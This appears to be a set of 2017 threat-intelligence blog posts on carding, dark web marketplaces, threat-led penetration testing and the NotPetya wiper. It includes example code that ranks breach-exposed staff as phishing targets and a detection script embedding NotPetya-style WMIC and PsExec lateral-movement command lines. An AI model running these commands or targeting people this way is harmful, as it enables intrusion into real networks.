    If you have an internet presence: attackers are always on the lookout for deniable infrastructure to use in their campaigns. Infrastructure that has a good level of connectivity and a poor security posture is ideal. It is no surprise that attackers such as the Equation Group used cloud hosted virtual machines and university computers to redirect traffic towards their targets. While asset owners may not consider their assets to be particularly sensitive, the value of having a reliable, deniable infrastructure which attackers can freely use for their own purposes is very high. The feasibility and speed of Internet-wide scanning means that vulnerable internet-connected machines do not remain undetected for long.

    If you store data: many organizations collect large amounts of data for their own purposes. In particular, data and metadata around how their customers are using their system. This data may well be part of an attacker’s collection requirements. The Equation Group compromise of Eastnets and potentially other SWIFT Service Bureaus shows that, while the organizations may consider security as part of their regular operations, they may face attacks from actors with a significantly higher capability than what they anticipated due to the perceived value of the data that they hold.

Security is a global, pervasive responsibility for all organizations. It is clear that many organizations that did not consider themselves high-value targets, or as bearing a high degree of responsibility for security, may need to reconsider. Paranoia and hysteria are to be avoided, but a sober analysis is needed of the real risks to an organization and, by extension, to the other organizations or people for which it is a dependency. An understanding of attacker goals and security engineering principles, coupled with a robust approach to threat modelling, goes a long way to reducing the uncertainty around risk to an organization.

    Fraudsters Scoring Big – an Inside Look at the Carding Ecosystem Tue, 18 Jul 2017 18:52:49 +0000 In season two of the Netflix series Narcos, Pablo Escobar points out that: “I’m not a rich person. I’m a poor person with money.” In real-life, Escobar’s cartel reportedly made so much money (at one point $US420 million a week) that their chief accountant, Roberto Escobar, claimed that they “would write off 10% of the money because the rats would eat it in storage or it would be damaged by water or lost.” This “poor” person certainly had a lot of money.

Online carding is another industry which is consistently lucrative for criminals, with payment card fraud projected to reach $24 billion by the end of 2018. Our latest whitepaper reveals how criminals develop their capabilities and highlights a professional e-learning carding course, complete with webinars, instructors and reading material. The increased professionalization and sophistication of this fraud has negative implications for credit card companies, merchants and consumers.

    Figure 1: An English translation of the carding course overview

    Whatever happened to EMV? Wasn’t payment card fraud meant to have been solved by the introduction of Chip and PIN? The implementation of EMV in the US has had its own problems. As I went to use my card over the weekend, I was prompted with the all-too-familiar message “No chip. Please swipe”.

    Figure 2: Many United States’ EMV terminals are disabled and force customers to swipe instead

    Recent research indicates that the increasing adoption of EMV has made physical card fraud more difficult, making Card Not Present (CNP) fraud more popular. CNP fraud occurs when the customer doesn’t physically present the card and uses card details online or over the phone. If we consider that annual online card spending will double to $6 trillion by 2021, this is a growth industry for cybercriminals.

    Just as in Narcos’ cocaine empire, CNP fraud is unlikely to be achieved by a criminal acting alone. They rely on a sophisticated ecosystem and support network that provides a wide range of credit card details, fraud tools and online tutorials. This includes:

    • Payment Card Data Harvesters – do the ‘dirty work’ in terms of harvesting the payment card information. This is done by intercepting cardholders’ information, whether through point-of-sale malware, skimming devices, phishing, breached databases, or operating botnets
    • Distributors – are the ‘middle men’ who typically make the most money. While the criminals who harvest may use the card data themselves, they also sell it on to others who will package, repackage and sell on the card information
    • Fraudsters – run the most risk in terms of getting caught by law enforcement or being conned by fellow criminals. Once fraudsters have acquired payment card information from their distributor, the fraud can happen. These individuals tend to be less technical and attract a lower calibre of cybercriminal, often relying on online guides and courses to learn the latest techniques
    • Monetization – There are many different roles within the stage, including those who have been duped into operating drop addresses and those involved in the reselling of fraudulently acquired goods.

    Payment card fraud is not new, nor are online guides and courses for the fraudsters. However, the professionalism, reputation and freshness of this course provides useful insights for organizations across a range of industries as well as consumers. Download a copy of our latest paper to learn about the latest techniques and advice for merchants, payment card companies, and consumers.

    The Future of Marketplaces: Forecasting the Decentralized Model Mon, 17 Jul 2017 16:03:09 +0000 Last week we wrote about the disappearance of AlphaBay dark web marketplace and assessed three potential scenarios to look out for next. We briefly alluded to new models for criminal online commerce, such as those espoused by OpenBazaar. In this blog, we wanted to drill down into the drivers that would contribute to an increased interest in decentralized marketplaces.

    AlphaBay’s disappearance has highlighted a continuing problem with the marketplace model: users must trust site operators and other users who are anonymous, willing to commit crimes, and potentially untrustworthy. Other issues with the marketplace model include sites’ vulnerability to law enforcement; by targeting site operators law enforcement agencies can potentially seize servers and gather intelligence on users, shut a site down entirely, or even take it over and run it as a “honeypot”. In this case, a honeypot would be a deception operation in which law enforcement attempts to attract criminal actors engaged in illicit activity to use a law enforcement operated service in order to facilitate information gathering.

An alternative model that precludes many of these issues is presented by P2P decentralized marketplaces, as recent reporting from DeepDotWeb regarding a dark web marketplace project on the Ethereum platform dubbed “Tralfalmadore” has demonstrated.

    What is a Decentralized Marketplace?

    Decentralized marketplaces use blockchain technology: a project blockchain serves as the back-end for the marketplace, storing the necessary databases and code to support front-end user interfaces. All transactions are made using cryptocurrency and are recorded as smart contracts on the blockchain. This addresses problems with user trust — if all transactions are permanently and immutably recorded, vendors who attempt to scam other users can be more easily identified. Furthermore, platform operators have no control over listings and the platform is split among many nodes, making it highly resilient to law enforcement takedowns or attacks by other criminal actors.

    Forecasting Development

    In addition to Tralfalmadore, a project dubbed OpenBazaar has been active since Apr 2016. Despite its advantages over a traditional marketplace, the platform has not been used for criminal activity to any great extent and support for the decentralized model within the criminal ecosystem has remained low. Our monitoring of criminal sites has indicated that a significant proportion of former AlphaBay users have migrated to Hansa, another marketplace platform. Based on an examination of criminal forums and discussion boards, we have identified the following drivers likely to be significant in future development of decentralized criminal marketplaces.

    Figure 1 – Table of drivers likely to influence the development of decentralized criminal marketplaces.

    We assess that it is unlikely decentralized criminal marketplaces will become widely adopted in the near to mid-term future; at the time of writing, traditional marketplaces and P2P interactions on forums have remained by far the most common platforms for criminal commercial enterprises. Furthermore, no platform with popular appeal to criminal actors yet exists.

    However, if projects such as Tralfalmadore are able to become established, they are likely to become more widely used in the long term. Drivers identified in this article are likely to be viable measures for assessing the prospects of newly established decentralized criminal marketplaces.

    The potential future emergence of decentralized marketplaces within the criminal ecosystem poses significant challenges for law enforcement agencies and private security vendors. Although public blockchains can be freely mined for data, the very high volume of content is likely to make parsing this information and developing actionable intelligence very technically and logistically challenging. Furthermore, previous law enforcement operations targeting criminal marketplaces or forums have tended to revolve around targeting site operators or geolocating servers and conducting raids; neither of these would likely be effective for targeting a decentralized platform. In this scenario, it would be more effective to target individual prominent vendors or vendor networks and attempt to identify and locate them.

    Therefore, although decentralized marketplaces are unlikely to become significant within the criminal ecosystem in the near to mid-term future, they potentially represent a significant longer-term challenge for law enforcement and security vendors.

    AlphaBay Disappears: 3 Scenarios to Look For Next Fri, 14 Jul 2017 10:44:46 +0000 The AlphaBay dark web marketplace has been inaccessible since 05 Jul 2017. With no substantive explanation from the site’s owners, users have speculated that either an exit scam (where administrators steal user cryptocurrency deposited to the marketplace and shut down the service) or law enforcement action has taken place. Dark web market exit scams are nothing new; the Evolution market exit scam infamously resulted in the loss of 40,000 bitcoins ($12 million). Exit scams are one of the risks of conducting business in criminal marketplaces. On 13 Jul 2017 the Wall Street Journal claimed that the disruption was caused by a combined US, Canadian and Thai law enforcement operation in which Canadian national Alexandre Cazes was arrested in Bangkok. Cazes, who was reportedly suspected of acting as an AlphaBay administrator, was reported to have committed suicide in Thai custody. At the time of writing there had been no official confirmation of the claims made by the Wall Street Journal. With each day that passes the prospect of AlphaBay returning becomes increasingly unlikely.

    So, what would a post-AlphaBay future look like? We believe there are at least three possible scenarios:

    1. An older, established marketplace will replace AlphaBay.

    As is often the case when a popular marketplace disappears, users will simply migrate to other established sites. Already we have seen former AlphaBay vendors advertising their products on other marketplaces, including Hansa and Dream Market. Sellers have leveraged their AlphaBay vendor ratings as a measure of their trustworthiness and reputation. Relocation is made easier as many established vendors and regular customers would have already had multiple accounts across the major markets.


    Figure 1: Hansa vendor highlighting their AlphaBay credentials

    With AlphaBay seemingly out of the picture, other sites will jostle for supremacy by trying to attract new users through advertising and membership deals. RS Club Market, for example, announced a referral offer on 09 Jul 2017 (a few days after AlphaBay’s disappearance) encouraging members to invite new users in return for 30% of the site’s commission fee. The House of Lions marketplace, similarly, has given AlphaBay sellers an opportunity to negotiate on the vendor fee if they can verify their experience and reputation.


    Figure 2: The House of Lions market has actively targeted former AlphaBay vendors

    Enlarging your customer base, however, brings its own challenges. Hansa users have reported issues accessing the site in the last week. As Hansa does not require users to log in to view products, a large increase in web traffic may have disrupted the service. Hansa administrators have now been forced to suspend new registrations as they deal with “technical issues” caused by what they have called an “AlphaBay refugee” influx.


    Figure 3: Hansa has struggled to cope with the deluge of new registrations

    2. A new marketplace will arise from AlphaBay’s ashes

    Some AlphaBay users were so fond of their former haunt that they have created a new iteration of the marketplace, dubbed GammaBay. We discovered the following call to arms by a self-described AlphaBay veteran on Reddit: 


    Figure 4: Reddit post promoting GammaBay


    Figure 5: GammaBay site imitates the old AlphaBay design

    At this stage, the GammaBay site is still in its infancy, and the marketplace section remains unfinished. With only 20 members registered on the site so far, it is unlikely the new site will be able to reach the heights of its predecessor. Moreover, with rumors that AlphaBay had been disrupted by law enforcement, many users have expressed a reluctance to register for GammaBay, fearing that the site is actually a honeypot intended to lure in former AlphaBay vendors. Perceived trust in a market will play a large role in its chances of future success.


    Figure 6: Reddit user stating their suspicions about GammaBay

    3. Users will abandon the marketplace model and look for alternative solutions

    The fallout from AlphaBay’s disappearance could have far-reaching implications for the future of the marketplace model. If an exit scam has taken place, the declining trust in these markets may lead disillusioned users towards alternative methods for conducting online transactions. If law enforcement was responsible, then the risk of legal action will only encourage vendors to seek more secure and anonymized methods of trade.

    Although sites such as AlphaBay are very popular for goods such as drugs and credit card information, cybercriminals selling sensitive data or malware variants have frequently opted for direct peer-to-peer (P2P) communication and relationships made on specialized forums. While vendors and customers might lose the convenience of trading on a popular marketplace, they could decide that a P2P model will give them more control and help safeguard against exit scams and loss of funds.

    Following the seizure of Silk Road in 2013, some people began working on a new, fully decentralized marketplace known as OpenBazaar. This open source project is a P2P marketplace that allows the unrestricted sale of goods between users who need not identify themselves (although, without routing over Tor, the client exposes a user’s IP address to the peers it talks to). OpenBazaar is accessed through a front-end client which can be freely downloaded from the project website. Payments are made in Bitcoin, typically through a 2-of-3 multisignature escrow between buyer, vendor and a moderator, and each trade is recorded as a cryptographically signed contract exchanged directly between the parties; the project has no blockchain of its own.

    The Post-AlphaBay Future: Short- and Long-term Forecasts

    In the short-term, we assess that an existing marketplace such as Dream Market or Hansa will most likely fill AlphaBay’s shoes. The most successful marketplaces usually have a combination of: a user-friendly interface, administrator support services, attractive fee structures, and – crucially – a strong overall level of stability and reputation among the online community. As perhaps the two most established markets with the largest number of existing users, Dream Market and Hansa are best placed to capitalize. Nonetheless, as Hansa’s recent technical difficulties have highlighted, these sites will have to undertake improvements to ensure their user experience is in line with what members will demand. For Hansa and Dream Market, this will mean minimizing technical issues and refining their associated forum pages, which both pale in comparison to what the AlphaBay forum once offered.

    In the long-term, the fall of yet another popular dark web marketplace will only increase calls for a more secure, stable and trustworthy alternative to the current marketplace model. Here we believe P2P models such as that espoused by OpenBazaar have the potential to become increasingly attractive offerings to vendors and customers alike. It remains to be seen when a suitable platform will finally break through and disrupt the market. Digital Shadows will continue to track the demise of AlphaBay and its successors.

    Our next blog will explore the prospect of decentralized marketplaces in further detail.

    Threat Led Penetration Testing – The Past, Present and Future Mon, 10 Jul 2017 23:01:33 +0000 What is Threat Led Penetration Testing?

    Threat led penetration testing is, in essence, using threat intelligence to emulate the tactics, techniques and procedures (TTPs) of an adversary against a live, mission-critical system. The concept is currently being implemented in a number of ‘flavors’ around the globe, including the UK’s STAR (Simulated Target Attack and Response) and CBEST schemes, the Netherlands’ TIBER (Threat Intelligence Based Ethical Red teaming) scheme and Hong Kong’s iCAST scheme.

    The recent quarter has seen some extremely significant developments within the realm of threat led penetration testing (TLPT). The concept of TLPT is rapidly expanding beyond the United Kingdom. TLPT advances the boundaries of conventional penetration testing by seeking to adopt the tactics, techniques and procedures of an advanced threat actor aggressively targeting a critical system. You can read more about TLPT in a previous blog. Our work with the first two Dutch TIBER projects, as well as our workshop at the Bahrain International Cyber Security Forum & Expo, are great examples of this expansion.

    Given this expansion, I wanted to review where the TLPT concept has come from and where it may be going.

    The Past

    The origins of TLPT began with the UK’s CBEST scheme in 2013, to which Digital Shadows was a major contributor both in terms of the development of the original framework and the implementation of the actual projects.  Since then, there have been around fifty CBEST style engagements of which Digital Shadows has carried out the majority, from which three lessons have emerged:

    1. It has to be testable. Any testing scenario put forward by the threat intelligence provider has to be testable by the penetration test partner, within the scope of their capabilities. In practice this means less abseiling through open windows and more focus on technical exploits, such as the indicators of compromise associated with specific threat groups.
    2. The importance of the ‘golden thread’. This is an easy concept to outline but a challenge to implement. As the report moves from the initial quantitative, data collection stages to the later, qualitative scenario building, it should create activities linking data, information and intelligence into a “golden thread”. In practice this can be quite simple: for example, taking client email addresses that have appeared in data breaches and focusing the phishing campaign on them.
    3. Creative versus effective scenarios. The culmination of a TLPT (the TI phase at least) revolves around an attack scenario that follows the Exposition, Rising Action, Climax, Falling Action and Dénouement structure. While it can be tempting to devise elaborate scenarios, it’s important to remember that the core objective of a scenario is to compromise the target system using the simplest technical means that will work.
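    As an added illustration of the ‘golden thread’ in lesson 2 (example code written for this edit, not Digital Shadows’ tooling): the script joins a constructed client staff list against constructed breach-dump records, collapses address variants, and ranks the resulting phishing targets so that raw data becomes a scenario input. The client domain, the names, the breach names and dates, and the scoring weights are all assumptions.

```python
"""Added example (not Digital Shadows' code): turning raw breach data into a
prioritised phishing target list for a TLPT scenario, i.e. the 'golden thread'
from data -> information -> intelligence. All inputs are constructed; the
domain, names, breach names, dates and the scoring weights are assumptions."""
from collections import defaultdict
from datetime import date

# Constructed client staff list (the client domain is invented).
STAFF = [
    {"email": "j.doe@examplebank.test", "role": "finance"},
    {"email": "A.Smith@ExampleBank.test", "role": "sysadmin"},
    {"email": "p.jones@examplebank.test", "role": "marketing"},
    {"email": "k.lee@examplebank.test", "role": "exec"},
]

# Constructed breach-dump records, as a TI provider might collect them.
BREACH_RECORDS = [
    {"email": "j.doe@examplebank.test", "breach": "dump-a", "date": date(2016, 9, 1), "password": True},
    {"email": "a.smith@examplebank.test", "breach": "dump-a", "date": date(2016, 9, 1), "password": True},
    {"email": "a.smith+forum@examplebank.test", "breach": "dump-b", "date": date(2017, 3, 15), "password": False},
    {"email": "k.lee@examplebank.test", "breach": "dump-c", "date": date(2014, 1, 10), "password": True},
    {"email": "someone@otherorg.test", "breach": "dump-b", "date": date(2017, 3, 15), "password": True},
]

# Assumed weights: who an attacker would most want to phish first.
ROLE_WEIGHT = {"sysadmin": 3, "exec": 3, "finance": 2, "marketing": 1}


def normalise(email):
    """Lower-case and strip '+tag' sub-addressing so variants collapse to one person."""
    local, _, domain = email.strip().lower().partition("@")
    local = local.split("+", 1)[0]
    return f"{local}@{domain}"


def build_target_list(staff, records, today=date(2017, 7, 10)):
    """Return staff exposed in breaches, ranked by how attractive they are to phish."""
    roles = {normalise(s["email"]): s["role"] for s in staff}

    # Data -> information: group every exposure per normalised staff address.
    exposures = defaultdict(list)
    for r in records:
        addr = normalise(r["email"])
        if addr in roles:                   # ignore records for other organisations
            exposures[addr].append(r)

    # Information -> intelligence: score each exposed person.
    scored = []
    for addr, recs in exposures.items():
        breaches = {r["breach"] for r in recs}
        newest = max(r["date"] for r in recs)
        age_years = (today - newest).days / 365.0
        password_exposed = any(r["password"] for r in recs)
        score = ROLE_WEIGHT.get(roles[addr], 1) * len(breaches)
        if password_exposed:
            score += 2                      # leaked password invites credential reuse
        if age_years > 2:
            score -= 1                      # stale data is less likely to still be valid
        scored.append({"email": addr, "role": roles[addr], "breaches": sorted(breaches),
                       "password_exposed": password_exposed, "score": score})
    scored.sort(key=lambda t: (-t["score"], t["email"]))
    return scored


if __name__ == "__main__":
    for t in build_target_list(STAFF, BREACH_RECORDS):
        print(f"{t['score']:>2}  {t['email']:<30} {t['role']:<10} {','.join(t['breaches'])}")
```

    The point of the normalisation step is that breach dumps rarely spell an address the way the HR list does; without it, the second exposure of the sysadmin above would be missed and the ranking would be wrong.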

    The Present

    The CBEST scheme has been a huge success, which has led to the concept of TLPT being expanded beyond the financial services in the UK. Currently Hong Kong and the Netherlands have ‘in flight’ schemes with Singapore and the United States considering implementing their own proprietary schemes.

    • Sector diversification is happening, specifically across the telecoms, nuclear, wider energy and even space sectors. Although the sectors are varied, the principle of TLPT is the same: to test live, in-flight critical systems using the TTPs of real-world threat actors.
    • Regional expansion is rapidly occurring with Hong Kong, Singapore, The Netherlands and the USA all looking to develop and implement variants of TLPT.

    The Future

    It is worth speculating about some of the features that I feel will become fixtures within TLPT in the future.

    • Iterative development of scenarios within the penetration test phase. Future TLPT will iteratively update the threat profiles based on the results of the penetration test phase. This will result in a set of scenarios that are all viable, but only under specific sets of circumstances, shifting the scenario metric from ‘viable or not?’ to a more nuanced ‘viable under these circumstances’ (for example, a high-level insider combined with a zero-day vulnerability). Defenders could then assess the likelihood of a scenario coming to fruition based on the threat actor’s capability and the level of their own defences.
    • Reuse of the result. On average, the results of a TLPT have a shelf life of between 18 and 24 months. Therefore, the organization has the opportunity to reuse the final result for a number of technical and non-technical exercises, such as a crisis management workshop for executive leadership.
    • Broader range of organizational testing. There is huge potential for TLPT to expand from being a purely technical test to encompass non-technical elements of the client organization’s risk management framework, such as crisis management workshops and media management workshops.

    The success of the CBEST scheme and its subsequent expansion suggests that threat led penetration testing is an exciting trend. Of course, CBEST and TIBER are evolving rapidly, so future adoption by providers and users is hard to predict. However, by building on past successes and learning lessons, threat led penetration testing could go from strength to strength.

    Petya-Like Wormable Malware: The “Who” and the “Why” Fri, 30 Jun 2017 16:15:38 +0000 Late on 27 June, the New York Times reported that a number of Ukrainian banks and Ukrenergo, the Ukrainian state power distributor, had been affected by unidentified malware which caused significant operational disruption. Multiple security vendors and independent researchers subsequently identified the malware as a wormable ransomware variant with functional and technical similarities to Petya. Based on these similarities and continuing confusion, the malware has been dubbed Nyetya, Petna, ExPetr, and NotPetya, among others. It has been linked with a large number of infections, a significant proportion of which (around 60% according to statistics published by Kaspersky) affected machines in Ukraine, though at the time of writing the overall number of infections is not known.

    How NotPetya Works

    On 27 June, a social media account used by the National Police of Ukraine Cyberpolice Department suggested that the reported infections originated from a compromised software update delivered to users through MeDoc, a Ukrainian accounting software provider. While MeDoc has denied this, Microsoft has confirmed that a small number of infections were the result of malware being delivered to machines by MeDoc’s software update process. Once the malware was installed, intra-network propagation functions enabled it to spread rapidly between networked machines over the following vectors:

    • EternalBlue and EternalRomance exploits: EternalBlue and EternalRomance are exploits for SMBv1 remote code execution vulnerabilities (CVE-2017-0144 and CVE-2017-0145) leaked by the Shadow Brokers in April. These exploits were reportedly used to propagate between networked machines exposing SMB. Patches for these vulnerabilities were released by Microsoft in March (MS17-010), with out-of-band patches for unsupported versions of Windows following in May.
    • PsExec: The malware used a Mimikatz-like module to harvest credentials from the memory of the infected machine. These credentials were then passed to an older, legitimately signed copy of the Sysinternals PsExec tool which was dropped by the malware (reportedly as dllhost.dat). PsExec copied the malware DLL to the target’s ADMIN$ share and executed it remotely through rundll32.
    • Windows Management Instrumentation (WMI): The malware also used the harvested credentials with wmic.exe (/node:<target> /user:<user> /password:<password> process call create ...) to launch its copy on remote machines, again via rundll32. Note that neither of these two vectors needs an unpatched vulnerability: a single set of valid administrative credentials is enough.

    Figure 1 below shows a possible deployment and propagation process for the malware.


    Figure 1 – Deployment and intra-network propagation
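    The PsExec and WMI steps of the propagation chain above are exactly what a detection engineer wants to alert on, because unlike the SMB exploits they leave ordinary process-creation events behind. The following is an added example (not from the original post and not any vendor’s product) that runs three simple rules over constructed process-creation records in the style of Sysmon Event ID 1. The command lines are modelled on the publicly reported NotPetya pattern; the hostnames, IP addresses, account name and password are invented, and the rule names are this example’s own.

```python
"""Added example (not from the original post): detection logic for the
NotPetya-style lateral movement vectors, run over constructed process-creation
events (Sysmon Event ID 1 style). Command lines follow the publicly reported
pattern; hosts, IPs, the account and the password are invented."""
import re

# Constructed events: two benign local invocations, then three modelled on the
# NotPetya chain (remote WMIC execution, PsExec-style execution from a renamed
# binary, and the payload DLL being loaded by ordinal on the target).
EVENTS = [
    {"host": "WS01", "image": r"C:\Windows\System32\wbem\wmic.exe",
     "cmd": r'wmic.exe os get caption'},
    {"host": "WS01", "image": r"C:\Windows\System32\rundll32.exe",
     "cmd": r'rundll32.exe shell32.dll,Control_RunDLL'},
    {"host": "WS01", "image": r"C:\Windows\System32\wbem\wmic.exe",
     "cmd": r'wmic.exe /node:"10.0.0.7" /user:"corp\svc" /password:"Pa55" process call create "C:\Windows\System32\rundll32.exe \"C:\Windows\perfc.dat\" #1 60"'},
    {"host": "WS01", "image": r"C:\Windows\dllhost.dat",
     "cmd": r'C:\Windows\dllhost.dat \\10.0.0.8 -accepteula -s -d C:\Windows\System32\rundll32.exe C:\Windows\perfc.dat,#1 60'},
    {"host": "WS02", "image": r"C:\Windows\System32\rundll32.exe",
     "cmd": r'C:\Windows\System32\rundll32.exe C:\Windows\perfc.dat,#1 60'},
]


def _always(event):
    return True


# Each rule: a command-line pattern plus an optional predicate on the event.
RULES = [
    {"name": "wmic_remote_process_create_with_creds", "technique": "T1047",
     "pattern": re.compile(r"wmic(\.exe)?\s.*?/node:\S+.*?/user:.*?process\s+call\s+create", re.I),
     "extra": _always},
    {"name": "psexec_style_args_from_nonstandard_image", "technique": "T1021.002",
     "pattern": re.compile(r"-accepteula\b.*?-s\b.*?-d\b", re.I),
     # PsExec's own binary is expected; a renamed copy is not.
     "extra": lambda e: not e["image"].lower().endswith(("psexec.exe", "psexec64.exe"))},
    {"name": "rundll32_windows_root_dat_by_ordinal", "technique": "T1218.011",
     # rundll32 loading a .dat from C:\Windows and calling an export by ordinal (#1)
     "pattern": re.compile(r'rundll32(\.exe)?\s+\\?"?C:\\Windows\\\w+\.dat\\?"?,?\s*#\d+', re.I),
     "extra": _always},
]


def detect(events):
    """Return one finding per (event, rule) match."""
    findings = []
    for e in events:
        for rule in RULES:
            if rule["pattern"].search(e["cmd"]) and rule["extra"](e):
                findings.append({"host": e["host"], "rule": rule["name"],
                                 "technique": rule["technique"], "cmd": e["cmd"]})
    return findings


def hosts_with_remote_execution(findings):
    """Hosts that launched remote execution: the pivot points to isolate first."""
    return sorted({f["host"] for f in findings if f["technique"] in ("T1047", "T1021.002")})


if __name__ == "__main__":
    for f in detect(EVENTS):
        print(f"{f['host']}  {f['technique']:<10} {f['rule']}")
    print("pivot hosts:", hosts_with_remote_execution(detect(EVENTS)))
```

    The third rule fires on the target machine as well as on the source, which is useful: a host that loads a .dat by ordinal from the Windows directory moments after a remote WMIC or PsExec launch from another host is the propagation edge, and chaining the two events by time and address is the natural next step for a correlation rule.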

    Once installed, the malware functioned similarly to Petya, checking for the privileges it needed by calling the Windows API AdjustTokenPrivileges function. If this succeeded, the malware overwrote the infected machine’s Master Boot Record (MBR) with its own boot code and scheduled a reboot; the boot code then displayed a fake CHKDSK while encrypting the disk’s Master File Table, rendering the machine unbootable. Independently of this, a user-mode component encrypted individual files with AES-128, with the AES key subsequently encrypted using an embedded RSA-2048 public key. To obtain the private RSA key necessary to recover the AES key, victims were instructed to transfer $300 USD in Bitcoin to a specified Bitcoin address and send their wallet ID and victim ID number in an email to a specified address.


    While the malware’s functionality has reportedly made it highly effective at propagating to machines within a local network, it has been reported as having no function for spreading outside of these local networks. It was therefore assessed as likely to be much more effective for conducting targeted attacks than wCry (AKA WannaCry).

    In the case of NotPetya, it is highly likely that the ransom payment method was never intended to result in revenue for the attackers or the recovery of victim data. The email service provider with which the account was registered has publicly announced that the account has been disabled, and it has subsequently been reported that the victim ID numbers were pseudo-randomly generated rather than derived from the RSA-encrypted AES key. This means the threat actors could not have provided victims with the correct decryption key, even if a victim had paid the ransom and succeeded in making contact. Furthermore, Matt Suiche has reported that, unlike Petya, which encodes the original MBR and stores it elsewhere on the disk so that its changes can be reversed, this malware reportedly overwrote 24 sector blocks in the MBR region of the disk without preserving a recoverable copy, so the original boot sector cannot be restored.
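    To make the reversible-versus-irreversible distinction concrete, here is an added example (not from the original post, and not code from either malware family): a toy in-memory “disk” on which one routine replaces the MBR while stashing an encoded copy of the original in a spare sector, and another simply clobbers the first sectors. A would-be decryptor can undo the first and not the second. The backup sector number, the XOR key, the sector contents and the number of wiped sectors are assumptions chosen for the illustration; only the pattern matters.

```python
"""Added example (not from the original post): a toy in-memory disk contrasting
a reversible MBR replacement (original copy kept, encoded, in a spare sector)
with an irreversible overwrite (first sectors clobbered, nothing kept).
Sector numbers, the XOR key and all sector contents are assumptions."""
import os

SECTOR = 512
BACKUP_SECTOR = 34        # assumed spare sector used to stash the encoded MBR
XOR_KEY = 0x07            # assumed single-byte encoding key
WIPED_SECTORS = 24        # sectors after the MBR that get overwritten with no backup

# Stand-in boot code: 'jmp $' padded to a sector, with the 0x55AA signature.
FAKE_BOOTLOADER = b"\xEB\xFE" + b"\x90" * 508 + b"\x55\xAA"


def make_disk(num_sectors=64):
    """Constructed disk image: a fake MBR (random code, 0x55AA signature), then data sectors."""
    mbr = bytes([0x33, 0xC0, 0x8E, 0xD0]) + os.urandom(506) + b"\x55\xAA"
    data = b"".join(bytes([i]) * SECTOR for i in range(1, num_sectors))
    return bytearray(mbr + data)


def read_sector(disk, n):
    return bytes(disk[n * SECTOR:(n + 1) * SECTOR])


def write_sector(disk, n, payload):
    assert len(payload) == SECTOR
    disk[n * SECTOR:(n + 1) * SECTOR] = payload


def xor_bytes(buf, key):
    return bytes(b ^ key for b in buf)


def petya_style(disk):
    """Reversible: stash the XOR-encoded original MBR, then install the loader."""
    write_sector(disk, BACKUP_SECTOR, xor_bytes(read_sector(disk, 0), XOR_KEY))
    write_sector(disk, 0, FAKE_BOOTLOADER)


def notpetya_style(disk):
    """Irreversible: install the loader and clobber the following sectors; no backup."""
    write_sector(disk, 0, FAKE_BOOTLOADER)
    for n in range(1, WIPED_SECTORS + 1):
        write_sector(disk, n, os.urandom(SECTOR))


def try_restore_mbr(disk):
    """What a decryptor could do: decode the backup and reinstall it if it looks like an MBR."""
    candidate = xor_bytes(read_sector(disk, BACKUP_SECTOR), XOR_KEY)
    if candidate[-2:] == b"\x55\xAA":
        write_sector(disk, 0, candidate)
        return True
    return False


if __name__ == "__main__":
    d = make_disk()
    original = read_sector(d, 0)
    petya_style(d)
    print("petya-style restore:", try_restore_mbr(d), read_sector(d, 0) == original)
    d = make_disk()
    notpetya_style(d)
    print("notpetya-style restore:", try_restore_mbr(d))
```

    Real decryptors for the 2016 Petya family recovered the encoded MBR (and the key for the MFT encryption) from the disk in much the same way; with nothing preserved, there is nothing for a decryptor to work with, whatever the ransom note says.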

    With monetary gain as a motivation out of the picture, the most likely remaining motivation for NotPetya’s behavior is destructive malicious intent. Malicious intent is not synonymous with any single ‘class’ of threat actor: hacktivists ‘do it for the lulz’; nation state actors conduct malicious cyber-attacks to fulfill geostrategic objectives. With this in mind, NotPetya does demonstrate an advanced understanding of how to mount a widespread, hard-hitting cyber-attack, and of how to capitalize on that attack with maximum media exposure.


    Clues lie in the geopolitical context and the initial target geography of the malware. Kaspersky Lab has claimed a 60/30% split (total number of infections unknown) between Ukraine and Russia. Additionally, the initial attack occurred on the eve of Constitution Day, a Ukrainian public holiday. If one subscribes to the theory that Russian state or affiliated actors are responsible, this timing had the tactical effect of delaying a coherent response from Ukrainian defenders and the strategic effect of a symbolic blow against Ukrainian statehood. Although these facts are interesting, and they do suggest that the malware was aimed at the Ukrainian economy, they are circumstantial and do not conclusively link the incident to any particular nation state. Attribution is and will continue to be a challenge.

    The technology behind this attack is well within the range of many hacktivists and cyber criminals, and so these details have less diagnostic value when considering the ‘who’. Although speculative, there are other factors to consider: the supply chain compromise, efforts at obfuscation (hiding the wiper as ransomware), the geography that the malware was deployed in, and the timing of the deployment with Ukrainian national holidays. These point towards an attacker with political motivations behind the attack. It seems that the actor behind the NotPetya variant was politically motivated with an exceptional appetite to conduct cyber-attacks against specific organizations within the Ukraine target geography.

    Longer-Term Implications

    So where does this incident leave the longer-term assessment of the implications of NotPetya?

    • Prepare for stray bullets. Many organizations were impacted by the NotPetya campaign. The interconnectivity of modern systems and the ubiquity of applications means that enterprises could find themselves the victims of attacks not specifically targeting their organizations.
    • The bar for cyber-attacks keeps getting lower. The availability of leaked tools from the NSA and HackingTeam, coupled with ‘how to’ manuals, means that threat actors will have access to powerful tools that they can iterate on and leverage to aggressively accomplish their goals.

    Sadly, cyber-attacks of this nature are not uncommon and so businesses, governments and of course consumers need to take steps to protect themselves against ransomware attacks.

    1. The “basics” aren’t easy, but they should not be forgotten. Both NotPetya and the earlier WannaCry exploited basic and known security vulnerabilities, so segmenting networks and applying regular patching cycles will go a long way towards mitigating threats such as this, and towards reducing the ‘stray bullet’ factor outlined above.
    2. Think about the soft factors. Defense is no longer just about technical indicators and warnings; ‘soft’ factors such as motivation and geostrategic issues are no longer ‘nice to haves’ but are increasingly critical to the response to malware like NotPetya.
    3. Plan to fail. No amount of good security will entirely remove the risk posed by cyberattacks so it is critical to backup critical data and systems on a regular basis and ensure crisis management and comprehensive data recovery plans are in place and practiced.  Extortion and destructive malware response should be in your incident response playbooks.
    4. If you aren’t already doing so, think about the digital risks associated with your supply chain. Sure, not all suppliers are attack vectors for targeted attacks, but many suppliers do not have the same level of security maturity. Regardless of MeDoc’s alleged culpability, the deployment mechanism does highlight the attention that we all need to start paying to supply chain compromise.
    5. Defense in depth. Digital Shadows advocate using a ‘defense in depth’ strategy guided by four main principles: configuring host-based firewalls and using IP-whitelisting measures, segmenting networks and restricting workstation-to-workstation communication, applying patches and disabling unneeded legacy features, and restricting access to important data to only those who are required to have it.

    WannaCry and NotPetya are a sign of things to come, and you can expect attackers to improve their future campaigns.

